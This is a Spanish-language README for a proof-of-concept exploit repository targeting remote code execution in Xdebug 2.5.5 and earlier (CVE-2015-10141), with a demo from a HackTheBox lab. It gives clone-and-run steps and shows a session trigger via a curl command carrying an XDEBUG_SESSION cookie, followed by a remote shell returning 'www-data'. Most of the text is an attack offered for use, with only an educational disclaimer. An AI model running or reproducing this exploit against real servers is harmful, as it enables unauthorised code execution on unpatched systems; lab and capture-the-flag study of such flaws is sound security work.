
Script de explotación de prueba de concepto para Xdebug 2.5.5 y versiones anteriores (CVE-2015-10141).
Exploit personalizado en Python para Xdebug ≤ 2.5.5 (CVE-2015-10141).
Este repositorio contiene mi exploit de Prueba de Concepto (PoC) para la vulnerabilidad de ejecución remota de código en Xdebug en versiones 2.5.5 y anteriores.
El script aprovecha el protocolo de depuración no autenticado expuesto en el puerto 9000 para lograr ejecución remota de comandos.
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py
Cuando se solicite, ingrese la IP del objetivo donde está alojado Xdebug.
Demostración de mi reciente write-up de HackTheBox Olympus (Medium) :
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data
Este proyecto se crea únicamente con fines educativos.
NO use este exploit contra sistemas sin autorización explícita. No soy responsable del mal uso de este código.